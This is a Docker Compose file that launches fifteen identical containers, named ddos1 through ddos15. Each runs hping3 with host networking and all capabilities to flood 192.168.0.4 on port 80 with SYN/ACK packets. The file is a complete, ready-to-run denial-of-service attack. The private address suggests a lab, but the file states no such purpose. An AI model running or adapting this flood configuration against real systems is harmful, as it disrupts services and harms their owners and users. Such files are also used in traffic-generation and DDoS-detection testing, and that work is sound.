version: "3"
services: 
    ddos1:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos2:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos3:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos4:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos5:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos6:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos7:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos8:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos9:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos10:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos11:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos12:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos13:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos14:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos15:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "192.168.0.4", "-p", "80", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
